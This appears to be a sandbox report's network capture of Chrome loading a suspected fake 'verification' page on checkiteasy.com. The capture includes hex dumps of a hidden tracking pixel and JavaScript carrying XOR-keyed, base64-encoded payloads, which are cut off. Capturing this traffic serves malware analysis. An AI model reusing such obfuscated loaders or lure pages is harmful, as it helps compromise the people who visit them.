                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Referer: https://6p205g.ar.yourtaskforce.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:24 UTC6OUTData Raw: 5f 72 3d 25 32 46
                                                Data Ascii: _r=%2F
                                                2024-12-23 14:21:25 UTC204INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:25 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-12-23 14:21:25 UTC2957INData Raw: 62 38 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 74 72 61 63 6b 65 72 2e 70 68 70 22 20 61 6c 74 3d 22 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 59 6f 75 72 20 50 72 69 76 61 63 79 20 4d 61 74 74 65 72 73 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 20 20 20 20 76 61 72 20 65 6e 63 6f 64 65 64 48 74 6d 6c 20 3d 20 22 54 30 51 6e 50 53 59 67 4d 6a 55 38 55 77 30 58 48 77 6c 4b 59 56 6b 52 42 77 67 50 55 67 6b 56 42 51 4a 45 55 51 41 4e 55 46 74 2b 56 77 30 63 45 67 46 64 65 45 56
                                                Data Ascii: b81<!DOCTYPE html><html><head><img src="tracker.php" alt="" style="display:none;"> <title>Your Privacy Matters</title></head><body><script> var key = "secretkey"; var encodedHtml = "T0QnPSYgMjU8Uw0XHwlKYVkRBwgPUgkVBQJEUQANUFt+Vw0cEgFdeEV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.549763104.17.24.144434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:26 UTC590OUTGET /ajax/libs/font-awesome/6.0.0/css/all.min.css HTTP/1.1
                                                Host: cdnjs.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: text/css,*/*;q=0.1
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: style
                                                Referer: https://5mzcue1v.doc.checkiteasy.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:27 UTC948INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:27 GMT
                                                Content-Type: text/css; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=30672000
                                                ETag: W/"620188b3-468e"
                                                Last-Modified: Mon, 07 Feb 2022 21:01:39 GMT
                                                cf-cdnjs-via: cfworker/kv
                                                Cross-Origin-Resource-Policy: cross-origin
                                                Timing-Allow-Origin: *
                                                X-Content-Type-Options: nosniff
                                                CF-Cache-Status: HIT
                                                Age: 399232
                                                Expires: Sat, 13 Dec 2025 14:21:27 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k1%2FMQICJTLosPr6WlDWGVvPQOCsPRUQFJ253uPyWz03vEU3VZF9ZP2nKVgKFNSEot%2BIXv0IJIJvSSJxHBgC9lk3%2Fwkn9XiVLktY%2BpYZRyRLts%2Fpdtd5EHNFRwhnidkDGFUl90R8r"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                Strict-Transport-Security: max-age=15780000
                                                Server: cloudflare
                                                CF-RAY: 8f68ff85084f7c7b-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-12-23 14:21:27 UTC421INData Raw: 37 62 66 63 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 30 2e 30 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 32 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                Data Ascii: 7bfc/*! * Font Awesome Free 6.0.0 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2022 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                2024-12-23 14:21:27 UTC1369INData Raw: 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a
                                                Data Ascii: osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:
                                                2024-12-23 14:21:27 UTC1369INData Raw: 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d
                                                Data Ascii: fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0);animation-delay:var(--fa-animation-delay,0);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-
                                                2024-12-23 14:21:27 UTC1369INData Raw: 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69
                                                Data Ascii: a-animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infi
                                                2024-12-23 14:21:27 UTC1369INData Raw: 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c
                                                Data Ascii: -direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animation-duration,1s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,
                                                2024-12-23 14:21:27 UTC1369INData Raw: 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 7d 2e 66 61 2d 73 70 69 6e
                                                Data Ascii: nt:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-animation-timing,linear);animation-timing-function:var(--fa-animation-timing,linear)}.fa-spin
                                                2024-12-23 14:21:27 UTC1369INData Raw: 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b
                                                Data Ascii: ));transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@-webkit-keyframes fa-bounce{0%{-webk
                                                2024-12-23 14:21:27 UTC1369INData Raw: 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 33 30 25 7b 2d 77
                                                Data Ascii: (0);transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0);transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0)}30%{-w
                                                2024-12-23 14:21:27 UTC1369INData Raw: 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d
                                                Data Ascii: fade-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}
                                                2024-12-23 14:21:27 UTC1369INData Raw: 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25 2c 32 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 7d 31 32 25 2c 32 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 7d 31 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72
                                                Data Ascii: nsform:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%,24%{-webkit-transform:rotate(-18deg);transform:rotate(-18deg)}12%,28%{-webkit-transform:rotate(18deg);transform:rotate(18deg)}16%{-webkit-transfor


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.549759135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:26 UTC564OUTGET /style.css HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: text/css,*/*;q=0.1
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: style
                                                Referer: https://5mzcue1v.doc.checkiteasy.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:27 UTC278INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:27 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Last-Modified: Fri, 20 Dec 2024 13:55:51 GMT
                                                ETag: "10ce-629b40131df37"
                                                Accept-Ranges: bytes
                                                Content-Length: 4302
                                                Vary: Accept-Encoding
                                                Content-Type: text/css
                                                2024-12-23 14:21:27 UTC4302INData Raw: 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 20 55 49 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 7d 0a 0a 2e 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 64 69
                                                Data Ascii: * { margin: 0; padding: 0; box-sizing: border-box;}body { font-family: 'Segoe UI', Arial, sans-serif; background-color: #f5f5f5; line-height: 1.6; min-height: 100vh;}.verification-container { min-height: 100vh; di


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.549760135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:26 UTC550OUTGET /script.js HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://5mzcue1v.doc.checkiteasy.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:27 UTC286INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:27 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Last-Modified: Sun, 22 Dec 2024 12:49:11 GMT
                                                ETag: "31e6-629db4e740e58"
                                                Accept-Ranges: bytes
                                                Content-Length: 12774
                                                Vary: Accept-Encoding
                                                Content-Type: text/javascript
                                                2024-12-23 14:21:27 UTC7906INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 6a 61 6d 65 73 62 6f 6e 64 22 3b 0a 76 61 72 20 65 6e 63 6f 64 65 64 53 63 72 69 70 74 20 3d 20 22 44 67 34 4f 45 42 34 48 41 52 70 4b 43 77 55 4a 49 41 55 48 41 52 6f 6f 41 78 49 5a 41 42 30 48 48 55 5a 44 4c 69 34 67 4a 68 77 4d 47 77 73 4b 48 69 30 43 42 42 63 48 43 30 6c 49 53 67 41 65 48 42 30 42 54 30 5a 4e 53 6c 78 54 52 51 68 76 5a 55 35 45 53 6b 45 42 41 41 64 43 44 68 73 51 42 51 59 66 42 42 45 41 43 67 6f 68 42 77 41 45 43 56 4e 66 54 30 6c 44 55 57 78 6e 52 56 4e 43 54 77 30 4c 42 42 49 5a 52 52 6f 52 49 67 45 47 41 77 30 49 52 55 35 43 51 41 63 30 41 67 34 44 41 41 38 4c 50 77 38 41 46 67 67 39 43 68 63 65 4c 67 41 41 47 41 34 45 41 56 77 4c 51 52 6f 42 47 52 56 46 43 78 49 55 42 67 6b 46 48 67 34 66 53 77 59
                                                Data Ascii: var key = "jamesbond";var encodedScript = "Dg4OEB4HARpKCwUJIAUHARooAxIZAB0HHUZDLi4gJhwMGwsKHi0CBBcHC0lISgAeHB0BT0ZNSlxTRQhvZU5ESkEBAAdCDhsQBQYfBBEACgohBwAECVNfT0lDUWxnRVNCTw0LBBIZRRoRIgEGAw0IRU5CQAc0Ag4DAA8LPw8AFgg9ChceLgAAGA4EAVwLQRoBGRVFCxIUBgkFHg4fSwY
                                                2024-12-23 14:21:27 UTC4868INData Raw: 51 61 4b 52 59 45 47 30 35 5a 53 69 77 4d 45 52 74 4d 41 67 38 63 51 6c 56 42 52 54 34 44 47 77 5a 4b 42 77 67 44 54 52 30 48 47 43 49 42 44 42 56 42 52 52 34 44 46 79 49 42 44 42 56 45 54 45 68 76 5a 55 35 45 53 6b 46 4e 52 56 4e 43 54 30 35 45 53 67 4d 59 45 51 63 4e 41 55 41 58 48 68 67 42 41 46 30 4f 43 67 67 51 53 6c 78 4e 42 56 63 5a 41 51 73 54 4a 67 51 4c 45 51 34 53 46 77 35 66 5a 32 74 4e 52 56 4e 43 54 30 35 45 53 6b 46 4e 52 56 4d 57 48 51 38 48 41 55 38 65 45 51 6f 4f 43 6b 41 54 41 77 55 5a 44 56 4e 66 54 77 35 41 45 51 38 49 45 6a 38 48 43 52 70 45 51 55 45 50 45 41 63 57 41 41 42 4b 43 51 30 45 41 42 30 57 4f 41 63 41 48 67 6c 43 56 77 34 53 46 77 35 66 5a 32 74 67 62 31 4e 43 54 30 35 45 53 6b 46 4e 52 56 4e 43 54 77 63 43 53 6b 6b 44 41
                                                Data Ascii: QaKRYEG05ZSiwMERtMAg8cQlVBRT4DGwZKBwgDTR0HGCIBDBVBRR4DFyIBDBVETEhvZU5ESkFNRVNCT05ESgMYEQcNAUAXHhgBAF0OCggQSlxNBVcZAQsTJgQLEQ4SFw5fZ2tNRVNCT05ESkFNRVMWHQ8HAU8eEQoOCkATAwUZDVNfTw5AEQ8IEj8HCRpEQUEPEAcWAABKCQ0EAB0WOAcAHglCVw4SFw5fZ2tgb1NCT05ESkFNRVNCTwcCSkkDA


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.549761135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:26 UTC612OUTGET /tracker.php HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://5mzcue1v.doc.checkiteasy.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:27 UTC172INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:27 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.549762135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:26 UTC615OUTGET /image/logo.png HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
